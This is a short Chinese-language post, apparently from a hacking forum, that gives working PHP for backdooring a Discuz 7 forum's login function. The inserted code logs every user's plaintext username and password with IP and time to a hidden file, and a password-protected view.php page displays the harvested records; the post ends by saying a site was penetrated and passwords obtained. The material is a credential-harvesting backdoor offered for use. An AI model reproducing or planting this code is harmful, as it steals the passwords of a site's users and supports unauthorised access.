scuz7密码php记录版

内容如下；

$ip=$_SERVER['REMOTE_ADDR'];
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
$handle=fopen('./ipdata/csshacklog.php','a+');
$write=fwrite($handle,$record);

修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上代码,在网站ipdata目录下自动生成csshacklog.php
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw

View.php 代码：

<?
error_reporting(0);
$psw="falw"; //Pass
if($_GET[action]=="logout") {

setcookie("pass_wd",'');
exit('<META http-equiv=Content-Type content="text/html; charset=gb2312"><a href="?action=login">Relogin</a><BR>');
}
$_REQUEST[pass_wd]= $_POST[pass_wd]?$_POST[pass_wd]:$_REQUEST[pass_wd];
if ($_REQUEST[pass_wd] !== $psw) {
if( $_POST[pass_wd]) {echo "wrong password.<br>";}
?>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<form method="POST" action="?">
<p>Pass：<input type="password" name="pass_wd" size="20" value=""></p>
<p><input type="submit" value="Go" name="B2"></p>
</form>
<?

exit;
}else {setcookie("pass_wd",$_REQUEST[pass_wd]);}
?>
<?
if($_GET['notencode']) {
$a=file_get_contents("csshacklog.php");
$a=str_replace("<?exit();?>","",$a);
echo $a;
exit;
}
?>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
WebLog:<br><br>
<a href="?">Refresh</a>

&nbsp;&nbsp;
<a href="?action=logout">Exit</a><BR>
<pre>
<B>Record：</B>

<?
$a=file_get_contents("csshacklog.php");
$a=str_replace("<?exit();?>","",$a);
echo htmlspecialchars($a);

?>
</pre>

**********渗透一站点，获取的用户密码如下